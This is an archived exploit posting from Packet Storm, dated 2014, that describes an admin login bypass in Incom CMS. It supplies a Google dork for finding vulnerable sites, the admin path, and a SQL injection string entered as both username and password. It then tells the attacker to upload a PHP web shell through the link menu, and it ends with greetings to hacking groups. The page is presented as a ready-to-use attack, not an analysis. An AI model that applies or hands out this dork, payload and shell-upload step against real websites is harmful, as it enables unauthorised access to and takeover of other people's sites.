what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Incom CMS SQL Injection

Incom CMS SQL Injection
Posted Dec 29, 2014
Authored by Xodiak

Incom CMS suffers from an authentication bypass vulnerability via remote SQL injection.

tags | exploit, remote, sql injection, bypass
SHA-256 | 28e1d1b127d9bf0b66f5bb5a2d7f99ee61b5bf34b4c66d93200d8b96697b8157

Incom CMS SQL Injection

Change Mirror Download
# Exploit Title: Incom Cms Admin Bypass Vulnerability
# Google Dork: intext:"incom cms" . intext:"site by overron" . intitle:"INCOM CMS"
# Date: 2014-12-29
# Exploit Author: Xodiak
# Vendor Homepage: http://facebook.com/xodiakbalckhat
# Software Link: http://incomcms.com
# Version: All Version
# Tested on: Kali , Windows
# CVE : N/A

Incom Cms Admin Bypass Vulnerability :

http://localhost/incomcms/_cm_admin/

Sometime You Get 403 Error Forbidden But Many Site Have This Vulnerability

After You Go In Admin Page Enter UserName & Password And Username And Password Is :

UserName : '=' 'or'
Password : '=' 'or'

And You Can Upload Your PHP Shell In Link Menu Without Any Authication

Special Tnx : Net-Hacker , Milad Hacking , MR.B3NY ,Seravo Black Hat , Mahdi.Hidden
MR.JOKER , MahdiYar , Mr.Cracker , Behrooz_Ice , Virangar , Ang3l--Demon , And All
Ashiyane Digital Securtiy Team , 2Ostad Members
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close